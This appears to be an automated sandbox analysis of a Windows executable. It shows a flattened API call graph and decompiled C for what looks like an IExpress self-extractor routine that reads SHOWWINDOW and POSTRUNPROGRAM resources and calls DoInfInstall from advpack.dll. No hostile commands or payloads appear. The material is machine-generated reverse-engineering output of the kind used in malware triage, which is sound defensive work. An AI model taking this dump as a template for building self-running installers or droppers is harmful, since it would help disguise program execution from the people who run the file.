2616->2619 2620 11d27e3 2616->2620 2618 11d28bf 2617->2618 2621 11d28d2 2618->2621 2622 11d658a CharPrevA 2618->2622 2619->2618 2624 11d658a CharPrevA 2620->2624 2623 11d6ce0 4 API calls 2621->2623 2622->2621 2625 11d28e2 2623->2625 2626 11d2810 RegOpenKeyExA 2624->2626 2625->2611 2626->2618 2627 11d2837 RegQueryValueExA 2626->2627 2628 11d285c 2627->2628 2629 11d289a RegCloseKey 2627->2629 2630 11d2867 ExpandEnvironmentStringsA 2628->2630 2631 11d287a 2628->2631 2629->2618 2630->2631 2631->2629 2633 11d1826 GetProcAddress 2632->2633 2634 11d1890 2632->2634 2635 11d1889 FreeLibrary 2633->2635 2636 11d1839 AllocateAndInitializeSid 2633->2636 2637 11d6ce0 4 API calls 2634->2637 2635->2634 2636->2635 2639 11d185f FreeSid 2636->2639 2638 11d189f 2637->2638 2638->2568 2638->2574 2639->2635 2642 11d468f 7 API calls 2641->2642 2643 11d51f9 LocalAlloc 2642->2643 2644 11d522d 2643->2644 2645 11d520d 2643->2645 2646 11d468f 7 API calls 2644->2646 2647 11d44b9 20 API calls 2645->2647 2648 11d523a 2646->2648 2649 11d521e 2647->2649 2650 11d523e 2648->2650 2651 11d5262 lstrcmpA 2648->2651 2652 11d6285 GetLastError 2649->2652 2653 11d44b9 20 API calls 2650->2653 2654 11d527e 2651->2654 2655 11d5272 LocalFree 2651->2655 2660 11d5223 2652->2660 2657 11d524f LocalFree 2653->2657 2658 11d44b9 20 API calls 2654->2658 2656 11d2f4d 2655->2656 2656->2436 2656->2438 2656->2445 2657->2656 2659 11d5290 LocalFree 2658->2659 2659->2660 2660->2656 2662 11d468f 7 API calls 2661->2662 2663 11d5175 2662->2663 2664 11d517a 2663->2664 2665 11d51af 2663->2665 2666 11d44b9 20 API calls 2664->2666 2667 11d468f 7 API calls 2665->2667 2668 11d518d 2666->2668 2669 11d51c0 2667->2669 2668->2442 2828 11d6298 2669->2828 2673 11d51ce 2675 11d44b9 20 API calls 2673->2675 2674 11d51e1 2674->2442 2675->2668 2677 11d468f 7 API calls 2676->2677 2678 11d55c7 LocalAlloc 2677->2678 2679 11d55fd 2678->2679 2680 11d55db 2678->2680 2681 11d468f 7 API calls 2679->2681 2682 11d44b9 20 API calls 2680->2682 2683 11d560a 
2681->2683 2684 11d55ec 2682->2684 2685 11d560e 2683->2685 2686 11d5632 lstrcmpA 2683->2686 2687 11d6285 GetLastError 2684->2687 2688 11d44b9 20 API calls 2685->2688 2689 11d564b LocalFree 2686->2689 2690 11d5645 2686->2690 2691 11d55f1 2687->2691 2693 11d561f LocalFree 2688->2693 2694 11d565b 2689->2694 2695 11d5696 2689->2695 2690->2689 2692 11d55f6 2691->2692 2698 11d6ce0 4 API calls 2692->2698 2693->2692 2702 11d5467 49 API calls 2694->2702 2696 11d589f 2695->2696 2699 11d56ae GetTempPathA 2695->2699 2697 11d6517 24 API calls 2696->2697 2697->2692 2700 11d2f7e 2698->2700 2701 11d56c3 2699->2701 2706 11d56eb 2699->2706 2700->2445 2700->2450 2840 11d5467 2701->2840 2704 11d5678 2702->2704 2704->2692 2705 11d5680 2704->2705 2708 11d44b9 20 API calls 2705->2708 2706->2692 2709 11d586c GetWindowsDirectoryA 2706->2709 2710 11d5717 GetDriveTypeA 2706->2710 2708->2691 2874 11d597d GetCurrentDirectoryA SetCurrentDirectoryA 2709->2874 2711 11d5730 GetFileAttributesA 2710->2711 2724 11d572b 2710->2724 2711->2724 2715 11d5467 49 API calls 2715->2706 2716 11d2630 21 API calls 2716->2724 2718 11d57c1 GetWindowsDirectoryA 2718->2724 2719 11d597d 34 API calls 2719->2724 2720 11d658a CharPrevA 2721 11d57e8 GetFileAttributesA 2720->2721 2722 11d57fa CreateDirectoryA 2721->2722 2721->2724 2722->2724 2723 11d5827 SetFileAttributesA 2723->2724 2724->2692 2724->2709 2724->2710 2724->2711 2724->2716 2724->2718 2724->2719 2724->2720 2724->2723 2725 11d5467 49 API calls 2724->2725 2870 11d6952 2724->2870 2725->2724 2727 11d6249 2726->2727 2728 11d6268 2726->2728 2729 11d44b9 20 API calls 2727->2729 2730 11d597d 34 API calls 2728->2730 2732 11d625a 2729->2732 2731 11d6277 2730->2731 2733 11d6ce0 4 API calls 2731->2733 2734 11d6285 GetLastError 2732->2734 2735 11d3013 2733->2735 2736 11d625f 2734->2736 2735->2445 2735->2456 2736->2731 2738 11d3b2d 2737->2738 2738->2738 2739 11d3b72 2738->2739 2740 11d3b53 2738->2740 2941 11d4fe0 2739->2941 2742 11d6517 24 API calls 2740->2742 2743 
11d3b70 2742->2743 2744 11d3b7b 2743->2744 2745 11d6298 10 API calls 2743->2745 2744->2461 2745->2744 2747 11d2583 2746->2747 2748 11d2622 2746->2748 2750 11d25e8 RegOpenKeyExA 2747->2750 2751 11d258b 2747->2751 2971 11d24e0 GetWindowsDirectoryA 2748->2971 2752 11d25e3 2750->2752 2753 11d2609 RegQueryInfoKeyA 2750->2753 2751->2752 2755 11d259b RegOpenKeyExA 2751->2755 2752->2466 2754 11d25d1 RegCloseKey 2753->2754 2754->2752 2755->2752 2756 11d25bc RegQueryValueExA 2755->2756 2756->2754 2758 11d3bdb 2757->2758 2769 11d3bec 2757->2769 2759 11d468f 7 API calls 2758->2759 2759->2769 2760 11d3c03 memset 2760->2769 2761 11d3d13 2763 11d44b9 20 API calls 2761->2763 2762 11d468f 7 API calls 2762->2769 2790 11d3d26 2763->2790 2764 11d3f4d 2766 11d6ce0 4 API calls 2764->2766 2767 11d3f60 2766->2767 2767->2470 2768 11d3d7b CompareStringA 2768->2769 2778 11d3fd7 2768->2778 2769->2760 2769->2761 2769->2762 2769->2764 2769->2768 2770 11d3fab 2769->2770 2774 11d3f1e LocalFree 2769->2774 2775 11d3f46 LocalFree 2769->2775 2769->2778 2780 11d3cc7 CompareStringA 2769->2780 2791 11d3e10 2769->2791 2979 11d1ae8 2769->2979 3019 11d202a memset memset RegCreateKeyExA 2769->3019 3045 11d3fef 2769->3045 2773 11d44b9 20 API calls 2770->2773 2777 11d3fbe LocalFree 2773->2777 2774->2769 2774->2778 2775->2764 2777->2764 2778->2764 3069 11d2267 2778->3069 2780->2769 2781 11d3e1f GetProcAddress 2784 11d3f64 2781->2784 2781->2791 2782 11d3f92 2783 11d44b9 20 API calls 2782->2783 2785 11d3fa9 2783->2785 2786 11d44b9 20 API calls 2784->2786 2787 11d3f7c LocalFree 2785->2787 2788 11d3f75 FreeLibrary 2786->2788 2789 11d6285 GetLastError 2787->2789 2788->2787 2789->2790 2790->2764 2791->2781 2791->2782 2792 11d3eff FreeLibrary 2791->2792 2793 11d3f40 FreeLibrary 2791->2793 3059 11d6495 2791->3059 2792->2774 2793->2775 2795 11d468f 7 API calls 2794->2795 2796 11d3a55 LocalAlloc 2795->2796 2797 11d3a6c 2796->2797 2798 11d3a8e 2796->2798 2799 11d44b9 20 API calls 2797->2799 2800 11d468f 7 API calls 
2798->2800 2801 11d3a7d 2799->2801 2802 11d3a98 2800->2802 2803 11d6285 GetLastError 2801->2803 2804 11d3a9c 2802->2804 2805 11d3ac5 lstrcmpA 2802->2805 2806 11d2f64 2803->2806 2807 11d44b9 20 API calls 2804->2807 2808 11d3b0d LocalFree 2805->2808 2809 11d3ada 2805->2809 2806->2436 2806->2445 2811 11d3aad LocalFree 2807->2811 2808->2806 2810 11d6517 24 API calls 2809->2810 2812 11d3aec LocalFree 2810->2812 2811->2806 2812->2806 2814 11d303c 2813->2814 2814->2445 2816 11d468f 7 API calls 2815->2816 2817 11d417d LocalAlloc 2816->2817 2818 11d41a8 2817->2818 2819 11d4195 2817->2819 2821 11d468f 7 API calls 2818->2821 2820 11d44b9 20 API calls 2819->2820 2822 11d41a6 2820->2822 2823 11d41b5 2821->2823 2822->2445 2824 11d41b9 2823->2824 2825 11d41c5 lstrcmpA 2823->2825 2827 11d44b9 20 API calls 2824->2827 2825->2824 2826 11d41e6 LocalFree 2825->2826 2826->2822 2827->2826 2829 11d171e _vsnprintf 2828->2829 2830 11d62c9 FindResourceA 2829->2830 2832 11d62cb LoadResource LockResource 2830->2832 2833 11d6353 2830->2833 2832->2833 2836 11d62e0 2832->2836 2834 11d6ce0 4 API calls 2833->2834 2835 11d51ca 2834->2835 2835->2673 2835->2674 2837 11d631b FreeResource 2836->2837 2838 11d6355 FreeResource 2836->2838 2839 11d171e _vsnprintf 2837->2839 2838->2833 2839->2830 2841 11d548a 2840->2841 2843 11d551a 2840->2843 2901 11d53a1 2841->2901 2912 11d58c8 2843->2912 2844 11d5581 2848 11d6ce0 4 API calls 2844->2848 2847 11d5495 2847->2844 2851 11d550c 2847->2851 2852 11d54c2 GetSystemInfo 2847->2852 2853 11d559a 2848->2853 2849 11d554d 2849->2844 2856 11d597d 34 API calls 2849->2856 2850 11d553b CreateDirectoryA 2854 11d5577 2850->2854 2855 11d5547 2850->2855 2857 11d658a CharPrevA 2851->2857 2861 11d54da 2852->2861 2853->2692 2864 11d2630 GetWindowsDirectoryA 2853->2864 2858 11d6285 GetLastError 2854->2858 2855->2849 2859 11d555c 2856->2859 2857->2843 2860 11d557c 2858->2860 2859->2844 2863 11d5568 RemoveDirectoryA 2859->2863 2860->2844 2861->2851 2862 11d658a CharPrevA 2861->2862 
2862->2851 2863->2844 2865 11d266f 2864->2865 2866 11d265e 2864->2866 2868 11d6ce0 4 API calls 2865->2868 2867 11d44b9 20 API calls 2866->2867 2867->2865 2869 11d2687 2868->2869 2869->2706 2869->2715 2871 11d696e GetDiskFreeSpaceA 2870->2871 2872 11d69a1 2870->2872 2871->2872 2873 11d6989 MulDiv 2871->2873 2872->2724 2873->2872 2875 11d59dd GetDiskFreeSpaceA 2874->2875 2876 11d59bb 2874->2876 2877 11d5ba1 memset 2875->2877 2878 11d5a21 MulDiv 2875->2878 2879 11d44b9 20 API calls 2876->2879 2880 11d6285 GetLastError 2877->2880 2878->2877 2881 11d5a50 GetVolumeInformationA 2878->2881 2882 11d59cc 2879->2882 2883 11d5bbc GetLastError FormatMessageA 2880->2883 2884 11d5a6e memset 2881->2884 2885 11d5ab5 SetCurrentDirectoryA 2881->2885 2886 11d6285 GetLastError 2882->2886 2887 11d5be3 2883->2887 2888 11d6285 GetLastError 2884->2888 2895 11d5acc 2885->2895 2889 11d59d1 2886->2889 2890 11d44b9 20 API calls 2887->2890 2891 11d5a89 GetLastError FormatMessageA 2888->2891 2899 11d5b94 2889->2899 2892 11d5bf5 SetCurrentDirectoryA 2890->2892 2891->2887 2892->2899 2893 11d6ce0 4 API calls 2894 11d5c11 2893->2894 2894->2706 2896 11d5b0a 2895->2896 2898 11d5b20 2895->2898 2897 11d44b9 20 API calls 2896->2897 2897->2889 2898->2899 2924 11d268b 2898->2924 2899->2893 2903 11d53bf 2901->2903 2902 11d171e _vsnprintf 2902->2903 2903->2902 2904 11d658a CharPrevA 2903->2904 2907 11d5415 GetTempFileNameA 2903->2907 2905 11d53fa RemoveDirectoryA GetFileAttributesA 2904->2905 2905->2903 2906 11d544f CreateDirectoryA 2905->2906 2906->2907 2908 11d543a 2906->2908 2907->2908 2909 11d5429 DeleteFileA CreateDirectoryA 2907->2909 2910 11d6ce0 4 API calls 2908->2910 2909->2908 2911 11d5449 2910->2911 2911->2847 2913 11d58d8 2912->2913 2913->2913 2914 11d58df LocalAlloc 2913->2914 2915 11d58f3 2914->2915 2918 11d5919 2914->2918 2916 11d44b9 20 API calls 2915->2916 2917 11d5906 2916->2917 2919 11d6285 GetLastError 2917->2919 2921 11d5534 2917->2921 2920 11d658a CharPrevA 2918->2920 2919->2921 2922 
11d5931 CreateFileA LocalFree 2920->2922 2921->2849 2921->2850 2922->2917 2923 11d595b CloseHandle GetFileAttributesA 2922->2923 2923->2917 2925 11d26b9 2924->2925 2926 11d26e5 2924->2926 2929 11d171e _vsnprintf 2925->2929 2927 11d271f 2926->2927 2928 11d26ea 2926->2928 2932 11d26e3 2927->2932 2936 11d171e _vsnprintf 2927->2936 2931 11d171e _vsnprintf 2928->2931 2930 11d26cc 2929->2930 2933 11d44b9 20 API calls 2930->2933 2935 11d26fd 2931->2935 2934 11d6ce0 4 API calls 2932->2934 2933->2932 2937 11d276d 2934->2937 2938 11d44b9 20 API calls 2935->2938 2939 11d2735 2936->2939 2937->2899 2938->2932 2940 11d44b9 20 API calls 2939->2940 2940->2932 2942 11d468f 7 API calls 2941->2942 2943 11d4ff5 FindResourceA LoadResource LockResource 2942->2943 2944 11d515f 2943->2944 2945 11d5020 2943->2945 2944->2743 2946 11d5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2945->2946 2947 11d5057 2945->2947 2946->2947 2963 11d4efd 2947->2963 2950 11d507c 2953 11d5106 2950->2953 2954 11d50e8 2950->2954 2951 11d5060 2952 11d44b9 20 API calls 2951->2952 2959 11d5075 2952->2959 2956 11d511d 2953->2956 2957 11d5110 FreeResource 2953->2957 2955 11d44b9 20 API calls 2954->2955 2955->2959 2958 11d513a 2956->2958 2960 11d5129 2956->2960 2957->2956 2958->2944 2962 11d514c SendMessageA 2958->2962 2959->2953 2961 11d44b9 20 API calls 2960->2961 2961->2958 2962->2944 2964 11d4f4a 2963->2964 2965 11d4fa1 2964->2965 2966 11d4980 25 API calls 2964->2966 2967 11d6ce0 4 API calls 2965->2967 2969 11d4f67 2966->2969 2968 11d4fc6 2967->2968 2968->2950 2968->2951 2969->2965 2970 11d4b60 FindCloseChangeNotification 2969->2970 2970->2965 2972 11d255b 2971->2972 2973 11d2510 2971->2973 2975 11d6ce0 4 API calls 2972->2975 2974 11d658a CharPrevA 2973->2974 2976 11d2522 WritePrivateProfileStringA _lopen 2974->2976 2977 11d2569 2975->2977 2976->2972 2978 11d2548 _llseek _lclose 2976->2978 2977->2752 2978->2972 2980 11d1b25 2979->2980 3083 11d1a84 2980->3083 2982 11d1b57 2983 11d658a CharPrevA 2982->2983 2985 
11d1b8c 2982->2985 2983->2985 2984 11d66c8 2 API calls 2986 11d1bd1 2984->2986 2985->2984 2987 11d1bd9 CompareStringA 2986->2987 2988 11d1d73 2986->2988 2987->2988 2989 11d1bf7 GetFileAttributesA 2987->2989 2990 11d66c8 2 API calls 2988->2990 2991 11d1c0d 2989->2991 2992 11d1d53 2989->2992 2993 11d1d7d 2990->2993 2991->2992 2998 11d1a84 2 API calls 2991->2998 2996 11d44b9 20 API calls 2992->2996 2994 11d1df8 LocalAlloc 2993->2994 2995 11d1d81 CompareStringA 2993->2995 2994->2992 2997 11d1e0b GetFileAttributesA 2994->2997 2995->2994 3004 11d1d9b 2995->3004 3016 11d1cc2 2996->3016 3008 11d1e1d 2997->3008 3018 11d1e45 2997->3018 2999 11d1c31 2998->2999 3001 11d1c50 LocalAlloc 2999->3001 3009 11d1a84 2 API calls 2999->3009 3000 11d1e89 3003 11d6ce0 4 API calls 3000->3003 3001->2992 3002 11d1c67 GetPrivateProfileIntA GetPrivateProfileStringA 3001->3002 3012 11d1cf8 3002->3012 3002->3016 3007 11d1ea1 3003->3007 3004->3004 3010 11d1dbe LocalAlloc 3004->3010 3007->2769 3008->3018 3009->3001 3010->2992 3011 11d1de1 3010->3011 3013 11d171e _vsnprintf 3011->3013 3014 11d1d09 GetShortPathNameA 3012->3014 3015 11d1d23 3012->3015 3013->3016 3014->3015 3017 11d171e _vsnprintf 3015->3017 3016->3000 3017->3016 3089 11d2aac 3018->3089 3020 11d209a 3019->3020 3021 11d2256 3019->3021 3023 11d171e _vsnprintf 3020->3023 3026 11d20dc 3020->3026 3022 11d6ce0 4 API calls 3021->3022 3024 11d2263 3022->3024 3025 11d20af RegQueryValueExA 3023->3025 3024->2769 3025->3020 3025->3026 3027 11d20fb GetSystemDirectoryA 3026->3027 3028 11d20e4 RegCloseKey 3026->3028 3029 11d658a CharPrevA 3027->3029 3028->3021 3030 11d211b LoadLibraryA 3029->3030 3031 11d212e GetProcAddress FreeLibrary 3030->3031 3032 11d2179 GetModuleFileNameA 3030->3032 3031->3032 3034 11d214e GetSystemDirectoryA 3031->3034 3033 11d21de RegCloseKey 3032->3033 3037 11d2177 3032->3037 3033->3021 3035 11d2165 3034->3035 3034->3037 3036 11d658a CharPrevA 3035->3036 3036->3037 3037->3037 3038 11d21b7 LocalAlloc 3037->3038 3039 11d21cd 
3038->3039 3040 11d21ec 3038->3040 3041 11d44b9 20 API calls 3039->3041 3042 11d171e _vsnprintf 3040->3042 3041->3033 3043 11d2218 RegSetValueExA RegCloseKey LocalFree 3042->3043 3043->3021 3046 11d4016 CreateProcessA 3045->3046 3057 11d4106 3045->3057 3047 11d40c4 3046->3047 3048 11d4041 WaitForSingleObject GetExitCodeProcess 3046->3048 3050 11d6285 GetLastError 3047->3050 3051 11d4070 3048->3051 3049 11d6ce0 4 API calls 3052 11d4117 3049->3052 3054 11d40c9 GetLastError FormatMessageA 3050->3054 3116 11d411b 3051->3116 3052->2769 3056 11d44b9 20 API calls 3054->3056 3055 11d4096 CloseHandle CloseHandle 3055->3057 3058 11d40ba 3055->3058 3056->3057 3057->3049 3058->3057 3060 11d64c2 3059->3060 3061 11d658a CharPrevA 3060->3061 3062 11d64d8 GetFileAttributesA 3061->3062 3063 11d64ea 3062->3063 3064 11d6501 LoadLibraryA 3062->3064 3063->3064 3065 11d64ee LoadLibraryExA 3063->3065 3066 11d6508 3064->3066 3065->3066 3067 11d6ce0 4 API calls 3066->3067 3068 11d6513 3067->3068 3068->2791 3070 11d2289 RegOpenKeyExA 3069->3070 3071 11d2381 3069->3071 3070->3071 3072 11d22b1 RegQueryValueExA 3070->3072 3073 11d6ce0 4 API calls 3071->3073 3074 11d2374 RegCloseKey 3072->3074 3075 11d22e6 memset GetSystemDirectoryA 3072->3075 3076 11d238c 3073->3076 3074->3071 3077 11d230f 3075->3077 3078 11d2321 3075->3078 3076->2764 3079 11d658a CharPrevA 3077->3079 3080 11d171e _vsnprintf 3078->3080 3079->3078 3081 11d233f RegSetValueExA 3080->3081 3081->3074 3084 11d1a9a 3083->3084 3086 11d1aba 3084->3086 3088 11d1aaf 3084->3088 3102 11d667f 3084->3102 3086->2982 3087 11d667f 2 API calls 3087->3088 3088->3086 3088->3087 3090 11d2be6 3089->3090 3091 11d2ad4 GetModuleFileNameA 3089->3091 3092 11d6ce0 4 API calls 3090->3092 3101 11d2b02 3091->3101 3094 11d2bf5 3092->3094 3093 11d2af1 IsDBCSLeadByte 3093->3101 3094->3000 3095 11d2bca CharNextA 3098 11d2bd3 CharNextA 3095->3098 3096 11d2b11 CharNextA CharUpperA 3097 11d2b8d CharUpperA 3096->3097 3096->3101 3097->3101 3098->3101 3100 11d2b43 
CharPrevA 3100->3101 3101->3090 3101->3093 3101->3095 3101->3096 3101->3098 3101->3100 3107 11d65e8 3101->3107 3103 11d6689 3102->3103 3104 11d66a5 3103->3104 3105 11d6648 IsDBCSLeadByte 3103->3105 3106 11d6697 CharNextA 3103->3106 3104->3084 3105->3103 3106->3103 3108 11d65f4 3107->3108 3108->3108 3109 11d65fb CharPrevA 3108->3109 3110 11d6611 CharPrevA 3109->3110 3111 11d660b 3110->3111 3112 11d661e 3110->3112 3111->3110 3111->3112 3113 11d663d 3112->3113 3114 11d6634 CharNextA 3112->3114 3115 11d6627 CharPrevA 3112->3115 3113->3101 3114->3113 3115->3113 3115->3114 3117 11d4132 3116->3117 3119 11d412a 3116->3119 3120 11d1ea7 3117->3120 3119->3055 3121 11d1eba 3120->3121 3123 11d1ed3 3120->3123 3122 11d256d 15 API calls 3121->3122 3122->3123 3123->3119 3125 11d2026 3124->3125 3126 11d1ff0 RegOpenKeyExA 3124->3126 3125->2479 3126->3125 3127 11d200f RegDeleteValueA RegCloseKey 3126->3127 3127->3125 3276 11d6a20 __getmainargs 3277 11d19e0 3278 11d1a24 GetDesktopWindow 3277->3278 3279 11d1a03 3277->3279 3280 11d43d0 11 API calls 3278->3280 3281 11d1a16 EndDialog 3279->3281 3283 11d1a20 3279->3283 3282 11d1a33 LoadStringA SetDlgItemTextA MessageBeep 3280->3282 3281->3283 3282->3283 3284 11d6ce0 4 API calls 3283->3284 3285 11d1a7e 3284->3285

                                                                      Callgraph

                                                                      • Executed
                                                                      • Not Executed
                                                                      • Opacity -> Relevance
                                                                      • Disassembly available

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      C-Code - Quality: 82%
                                                                      			E011D3BA2() {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				char _v276;
                                                                      				char _v280;
                                                                      				short _v300;
                                                                      				intOrPtr _v304;
                                                                      				void _v348;
                                                                      				char _v352;
                                                                      				intOrPtr _v356;
                                                                      				signed int _v360;
                                                                      				short _v364;
                                                                      				char* _v368;
                                                                      				intOrPtr _v372;
                                                                      				void* _v376;
                                                                      				intOrPtr _v380;
                                                                      				char _v384;
                                                                      				signed int _v388;
                                                                      				intOrPtr _v392;
                                                                      				signed int _v396;
                                                                      				signed int _v400;
                                                                      				signed int _v404;
                                                                      				void* _v408;
                                                                      				void* _v424;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t69;
                                                                      				signed int _t76;
                                                                      				void* _t77;
                                                                      				signed int _t79;
                                                                      				short _t96;
                                                                      				signed int _t97;
                                                                      				intOrPtr _t98;
                                                                      				signed int _t101;
                                                                      				signed int _t104;
                                                                      				signed int _t108;
                                                                      				int _t112;
                                                                      				void* _t115;
                                                                      				signed char _t118;
                                                                      				void* _t125;
                                                                      				signed int _t127;
                                                                      				void* _t128;
                                                                      				struct HINSTANCE__* _t129;
                                                                      				void* _t130;
                                                                      				short _t137;
                                                                      				char* _t140;
                                                                      				signed char _t144;
                                                                      				signed char _t145;
                                                                      				signed int _t149;
                                                                      				void* _t150;
                                                                      				void* _t151;
                                                                      				signed int _t153;
                                                                      				void* _t155;
                                                                      				void* _t156;
                                                                      				signed int _t157;
                                                                      				signed int _t162;
                                                                      				signed int _t164;
                                                                      				void* _t165;
                                                                      
                                                                      				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                      				_t69 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t69 ^ _t164;
                                                                      				_t153 = 0;
                                                                      				 *0x11d9124 =  *0x11d9124 & 0;
                                                                      				_t149 = 0;
                                                                      				_v388 = 0;
                                                                      				_v384 = 0;
                                                                      				_t165 =  *0x11d8a28 - _t153; // 0x0
                                                                      				if(_t165 != 0) {
                                                                      					L3:
                                                                      					_t127 = 0;
                                                                      					_v392 = 0;
                                                                      					while(1) {
                                                                      						_v400 = _v400 & 0x00000000;
                                                                      						memset( &_v348, 0, 0x44);
                                                                      						_t164 = _t164 + 0xc;
                                                                      						_v348 = 0x44;
                                                                      						if( *0x11d8c42 != 0) {
                                                                      							goto L26;
                                                                      						}
                                                                      						_t146 =  &_v396;
                                                                      						_t115 = E011D468F("SHOWWINDOW",  &_v396, 4);
                                                                      						if(_t115 == 0 || _t115 > 4) {
                                                                      							L25:
                                                                      							_t146 = 0x4b1;
                                                                      							E011D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                      							 *0x11d9124 = 0x80070714;
                                                                      							goto L62;
                                                                      						} else {
                                                                      							if(_v396 != 1) {
                                                                      								__eflags = _v396 - 2;
                                                                      								if(_v396 != 2) {
                                                                      									_t137 = 3;
                                                                      									__eflags = _v396 - _t137;
                                                                      									if(_v396 == _t137) {
                                                                      										_v304 = 1;
                                                                      										_v300 = _t137;
                                                                      									}
                                                                      									goto L14;
                                                                      								}
                                                                      								_push(6);
                                                                      								_v304 = 1;
                                                                      								_pop(0);
                                                                      								goto L11;
                                                                      							} else {
                                                                      								_v304 = 1;
                                                                      								L11:
                                                                      								_v300 = 0;
                                                                      								L14:
                                                                      								if(_t127 != 0) {
                                                                      									L27:
                                                                      									_t155 = 1;
                                                                      									__eflags = _t127 - 1;
                                                                      									if(_t127 != 1) {
                                                                      										L31:
                                                                      										_t132 =  &_v280;
                                                                      										_t76 = E011D1AE8( &_v280,  &_v408,  &_v404); // executed
                                                                      										__eflags = _t76;
                                                                      										if(_t76 == 0) {
                                                                      											L62:
                                                                      											_t77 = 0;
                                                                      											L63:
                                                                      											_pop(_t150);
                                                                      											_pop(_t156);
                                                                      											_pop(_t128);
                                                                      											return E011D6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                      										}
                                                                      										_t157 = _v404;
                                                                      										__eflags = _t149;
                                                                      										if(_t149 != 0) {
                                                                      											L37:
                                                                      											__eflags = _t157;
                                                                      											if(_t157 == 0) {
                                                                      												L57:
                                                                      												_t151 = _v408;
                                                                      												_t146 =  &_v352;
                                                                      												_t130 = _t151; // executed
                                                                      												_t79 = E011D3FEF(_t130,  &_v352); // executed
                                                                      												__eflags = _t79;
                                                                      												if(_t79 == 0) {
                                                                      													L61:
                                                                      													LocalFree(_t151);
                                                                      													goto L62;
                                                                      												}
                                                                      												L58:
                                                                      												LocalFree(_t151);
                                                                      												_t127 = _t127 + 1;
                                                                      												_v396 = _t127;
                                                                      												__eflags = _t127 - 2;
                                                                      												if(_t127 >= 2) {
                                                                      													_t155 = 1;
                                                                      													__eflags = 1;
                                                                      													L69:
                                                                      													__eflags =  *0x11d8580;
                                                                      													if( *0x11d8580 != 0) {
                                                                      														E011D2267();
                                                                      													}
                                                                      													_t77 = _t155;
                                                                      													goto L63;
                                                                      												}
                                                                      												_t153 = _v392;
                                                                      												_t149 = _v388;
                                                                      												continue;
                                                                      											}
                                                                      											L38:
                                                                      											__eflags =  *0x11d8180;
                                                                      											if( *0x11d8180 == 0) {
                                                                      												_t146 = 0x4c7;
                                                                      												E011D44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                      												LocalFree(_v424);
                                                                      												 *0x11d9124 = 0x8007042b;
                                                                      												goto L62;
                                                                      											}
                                                                      											__eflags = _t157;
                                                                      											if(_t157 == 0) {
                                                                      												goto L57;
                                                                      											}
                                                                      											__eflags =  *0x11d9a34 & 0x00000004;
                                                                      											if(__eflags == 0) {
                                                                      												goto L57;
                                                                      											}
                                                                      											_t129 = E011D6495(_t127, _t132, _t157, __eflags);
                                                                      											__eflags = _t129;
                                                                      											if(_t129 == 0) {
                                                                      												_t146 = 0x4c8;
                                                                      												E011D44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                      												L65:
                                                                      												LocalFree(_v408);
                                                                      												 *0x11d9124 = E011D6285();
                                                                      												goto L62;
                                                                      											}
                                                                      											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                      											_v404 = _t146;
                                                                      											__eflags = _t146;
                                                                      											if(_t146 == 0) {
                                                                      												_t146 = 0x4c9;
                                                                      												__eflags = 0;
                                                                      												E011D44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                      												FreeLibrary(_t129);
                                                                      												goto L65;
                                                                      											}
                                                                      											__eflags =  *0x11d8a30;
                                                                      											_t151 = _v408;
                                                                      											_v384 = 0;
                                                                      											_v368 =  &_v280;
                                                                      											_t96 =  *0x11d9a40; // 0x3
                                                                      											_v364 = _t96;
                                                                      											_t97 =  *0x11d8a38 & 0x0000ffff;
                                                                      											_v380 = 0x11d9154;
                                                                      											_v376 = _t151;
                                                                      											_v372 = 0x11d91e4;
                                                                      											_v360 = _t97;
                                                                      											if( *0x11d8a30 != 0) {
                                                                      												_t97 = _t97 | 0x00010000;
                                                                      												__eflags = _t97;
                                                                      												_v360 = _t97;
                                                                      											}
                                                                      											_t144 =  *0x11d9a34; // 0x1
                                                                      											__eflags = _t144 & 0x00000008;
                                                                      											if((_t144 & 0x00000008) != 0) {
                                                                      												_t97 = _t97 | 0x00020000;
                                                                      												__eflags = _t97;
                                                                      												_v360 = _t97;
                                                                      											}
                                                                      											__eflags = _t144 & 0x00000010;
                                                                      											if((_t144 & 0x00000010) != 0) {
                                                                      												_t97 = _t97 | 0x00040000;
                                                                      												__eflags = _t97;
                                                                      												_v360 = _t97;
                                                                      											}
                                                                      											_t145 =  *0x11d8d48; // 0x0
                                                                      											__eflags = _t145 & 0x00000040;
                                                                      											if((_t145 & 0x00000040) != 0) {
                                                                      												_t97 = _t97 | 0x00080000;
                                                                      												__eflags = _t97;
                                                                      												_v360 = _t97;
                                                                      											}
                                                                      											__eflags = _t145;
                                                                      											if(_t145 < 0) {
                                                                      												_t104 = _t97 | 0x00100000;
                                                                      												__eflags = _t104;
                                                                      												_v360 = _t104;
                                                                      											}
                                                                      											_t98 =  *0x11d9a38; // 0x0
                                                                      											_v356 = _t98;
                                                                      											_t130 = _t146;
                                                                      											 *0x11da288( &_v384);
                                                                      											_t101 = _v404();
                                                                      											__eflags = _t164 - _t164;
                                                                      											if(_t164 != _t164) {
                                                                      												_t130 = 4;
                                                                      												asm("int 0x29");
                                                                      											}
                                                                      											 *0x11d9124 = _t101;
                                                                      											_push(_t129);
                                                                      											__eflags = _t101;
                                                                      											if(_t101 < 0) {
                                                                      												FreeLibrary();
                                                                      												goto L61;
                                                                      											} else {
                                                                      												FreeLibrary();
                                                                      												_t127 = _v400;
                                                                      												goto L58;
                                                                      											}
                                                                      										}
                                                                      										__eflags =  *0x11d9a40 - 1; // 0x3
                                                                      										if(__eflags == 0) {
                                                                      											goto L37;
                                                                      										}
                                                                      										__eflags =  *0x11d8a20;
                                                                      										if( *0x11d8a20 == 0) {
                                                                      											goto L37;
                                                                      										}
                                                                      										__eflags = _t157;
                                                                      										if(_t157 != 0) {
                                                                      											goto L38;
                                                                      										}
                                                                      										_v388 = 1;
                                                                      										E011D202A(_t146); // executed
                                                                      										goto L37;
                                                                      									}
                                                                      									_t146 =  &_v280;
                                                                      									_t108 = E011D468F("POSTRUNPROGRAM",  &_v280, 0x104);
